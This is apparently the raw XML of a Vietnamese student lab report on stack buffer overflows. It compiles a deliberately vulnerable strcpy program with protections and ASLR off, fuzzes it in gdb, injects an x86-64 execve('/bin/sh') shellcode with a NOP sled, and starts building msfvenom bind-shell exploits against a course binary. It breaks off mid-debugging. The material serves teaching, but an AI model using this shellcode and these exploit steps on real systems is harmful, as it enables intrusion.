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ECC71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B1: mkdir stackoverflow &amp;&amp; cd stackoverflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ABEA79" w14:textId="2D38BB55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74777621" wp14:editId="25FBD06B">
            <wp:extent cx="5115639" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21412112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11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D070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B2: nano buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A72DC3" w14:textId="59D8459F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58F3D5FA" wp14:editId="1D64C345">
            <wp:extent cx="5544324" cy="590632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5061450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45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13CF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Biên dịch chương trình buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43545766" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>#include&amp;lt;stdio.h&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9CB4F" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>#include&amp;lt;string.h&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE954B7" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>int main(int argc, char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63C11A" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3ED5E" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>char buf[100];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E610C7" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>strcpy(buf,argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E9634" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>printf(&amp;quot;Input was: %s\n&amp;quot;,buf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55754904" w14:textId="77777777" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32C853" w14:textId="0F7F0F86" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6ABBD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B3: gcc -g -fno-stack-protector -z execstack buf.c -o buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C803DF" w14:textId="00304185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564E2FF5" wp14:editId="6CC2175F">
            <wp:extent cx="5731510" cy="480695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6069169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16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4CB3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B4: ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56880255" w14:textId="688A7041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220164C0" wp14:editId="0F4841C2">
            <wp:extent cx="5731510" cy="595630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8664508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50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3D19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B5: $sudo sysctl kernel.randomize_va_space=0 ( Tắt chức năng Address Space Layout Randomization (ASLR) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D28DC" w14:textId="1C2E32BD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335D4C3C" wp14:editId="21422BA6">
            <wp:extent cx="5731510" cy="488315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="15665089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08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F29F" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC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B6 : Khai thác lỗi tràn bộ đệm( tiền hành cài đặt gdp )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02B86B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$sudo apt update &amp;&amp; sudo apt install gdb -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DA596" w14:textId="4FE3B91D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6E417948" wp14:editId="2EC0CF28">
            <wp:extent cx="5731510" cy="1643380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14280960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96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11A3" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE3DDDD" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1269C7FA" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC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B7: gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2972E5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+(gdb)  run AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38145CE8" w14:textId="59D18C9B" w:rsidR="00BF38CC" w:rsidRP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 w:rsidRPr="00BF38CC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3AE4B149" wp14:editId="71580C02">
            <wp:extent cx="5731510" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="18988013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1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BA6B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+(gdb) run $(python2 -c"print 'A'*200")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C66AF2" w14:textId="617D2C45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1A184B54" wp14:editId="7C37DFEA">
            <wp:extent cx="5731510" cy="1172845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="14773400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40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8531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+(gdb) run $(python2 -c"print 'A'*216")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441CA99D" w14:textId="04CA1C89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58B560E0" wp14:editId="44F06FC4">
            <wp:extent cx="5731510" cy="1194435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="14208585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58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9F6A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+(gdb) run $(python2 -c"print 'A'*222")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33448045" w14:textId="40ED3A70" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF38CC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E7C289" wp14:editId="01FE53EB">
            <wp:extent cx="5731510" cy="1263650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13718524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52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6DAB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+(gdb) quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6CB650" w14:textId="5FA6A279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16B3EEE6" wp14:editId="7024C2DB">
            <wp:extent cx="5731510" cy="773430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="10353948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94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E986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gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343C1CFD" w14:textId="7A5A1812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6D5A57B5" wp14:editId="2CD4F02F">
            <wp:extent cx="5731510" cy="262255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="4101616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61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A08E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disassemble main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8847D8" w14:textId="678C6C2B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111E8943" wp14:editId="3B9590E4">
            <wp:extent cx="5731510" cy="2335530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="5572784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784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5090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break * main+91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E3D7B" w14:textId="6493528B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02D28F7E" wp14:editId="65E99439">
            <wp:extent cx="5731510" cy="257810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="839989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89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6A26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run $(python2 -c"print 'A'*200 + 'B'*8 + 'C'*8 + 'D'*6")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BB23D" w14:textId="1163620A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2CB4D162" wp14:editId="29C5FA97">
            <wp:extent cx="5731510" cy="1271270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="19840840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4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F25F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x/100x $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071DD4CE" w14:textId="3CFD3645" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF38CC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5917BCC6" wp14:editId="3DFADAAE">
            <wp:extent cx="5731510" cy="2571115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="20749631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3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A4AF" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA2803C" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDAF3AF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x $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F2778" w14:textId="00B374DA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7F9687EA" wp14:editId="4A9EC81C">
            <wp:extent cx="5731510" cy="296545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="15752801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0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8439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+ (gdb) x $rbp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974BAAD" w14:textId="048FC59E" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF38CC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A9D02F6" wp14:editId="1306B6B5">
            <wp:extent cx="5731510" cy="226695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1228534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34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5E17" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC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run $(python2 -c "print 'x90'*152 + '^[[200~\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A7AF6" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC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x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C0AB5" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC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xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A538557" w14:textId="77777777" w:rsidR="00BF38CC" w:rsidRDefault="00BF38CC" w:rsidP="00BF38CC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x0f\x05' + 'B'*8 + 'c'*8 + '&lt;Mot dia chi bat ky o vi tri 0 toi 152 cua buffer&gt;'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5214E0AD" w14:textId="39D2E333" w:rsidR="007078BE" w:rsidRDefault="007078BE" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007078BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A62E315" wp14:editId="254D0C47">
            <wp:extent cx="5731510" cy="2405380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14114936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936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25E1" w14:textId="77777777" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9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Câu 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCED256" w14:textId="7D0EA7EF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Buóc 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495BEB59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wget -nv </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Siuktni"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://samsclass.info/127/proj/ED3a.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6660A187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wget -nv https://samsclass.info/127/proj/ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24219CF9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ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E33923" w14:textId="2057B98F" w:rsidR="00226C25" w:rsidRDefault="003528E9" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003528E9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60765B98" wp14:editId="0330C527">
            <wp:extent cx="5731510" cy="4154805"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="710050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50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7721" w14:textId="77777777" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9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Bước 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DF7716" w14:textId="4A312CE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cd chmod a+x ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE85717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sudo chmod a+x ED3a  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F61EDDD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./ED3a Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF0F54" w14:textId="77777777" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="Thngthng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cat ED3a.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F84746" w14:textId="239E90AF" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003528E9">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15215FAB" wp14:editId="166C0DCA">
            <wp:extent cx="5731510" cy="4603750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="19516933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933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55DF" w14:textId="7D46A7DE" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706E31AF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nano fuzzer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E750833" w14:textId="77777777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46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:t>#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC86FA7" w14:textId="77777777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46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767065C8" w14:textId="77777777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46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:t>length = int(sys.argv[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD9D45" w14:textId="77777777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46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:t>print('A' * length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C874466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chmod a+x fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C57B8D9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./fuzzer 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778AB35B" w14:textId="5C727EEB" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003528E9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F7BD470" wp14:editId="54869B21">
            <wp:extent cx="5731510" cy="1279525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11365497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497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E68B" w14:textId="7E63130F" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915E1D5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./ED3a $(./fuzzer 1020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785A057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gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C64FC07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run $(./fuzzer 1020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4008CFEE" w14:textId="43A4181D" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003528E9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093DD720" wp14:editId="5E393F7D">
            <wp:extent cx="5731510" cy="2588895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="11823852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85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2012" w14:textId="77B546FA" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9786F6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nano ex1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53216C19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#!/usr/bin/python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443CE807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prefix = 'A' * 1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E326D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pattern = 'BBBBCCCCDDDDEEEEFFFF' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2301704B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print( prefix + pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093DA7EB" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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1D5F9E77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chmod a+x ex1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F08A1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gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AFAAF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run $(./ex1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03854628" w14:textId="6E4E4159" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003528E9">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B2DF7BB" wp14:editId="01EFAD6B">
            <wp:extent cx="5731510" cy="2884805"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3194848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848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77AE" w14:textId="40549EE6" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A7A97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sudo msfvenom -l payloads | grep linux | grep bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDE2DF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sudo msfvenom -p linux/x86/shell_bind_tcp --list-options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B57422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nano ex2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7934FE23" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010670FE" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nopsled = '\x90' * 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F295F84" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>buf = "B" * 200  # Định nghĩa biến buf với độ dài 200 ký tự (có thể điều chỉnh độ dài theo nhu cầu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21424158" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>suffix = 'A' * (1012 - len(nopsled) - len(buf))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D18BB0" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>eip = '1234'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E893B0" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>attack = nopsled + buf + suffix + eip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F769BFB" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>print(attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444ACC3E" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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048A3B1F" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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460ACA82" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528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2707CA8C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chmod +x ex2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F23738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lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>./ex2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D61CC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vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>gdb -q ED3a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD8BBA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vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>break * 0x08049241</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56463663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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>run $(./ex2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1494E" w14:textId="77777777" w:rsidR="003528E9" w:rsidRPr="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E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528E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFE6B2B" w14:textId="7AAD2734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D05C55C" wp14:editId="44C441A7">
            <wp:extent cx="5731510" cy="5068570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1466154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CC5B" w14:textId="77777777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32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>x/410x $esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7837A51C" w14:textId="0A5B6E92" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r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2BC2D12" wp14:editId="6D199AFB">
            <wp:extent cx="5731510" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
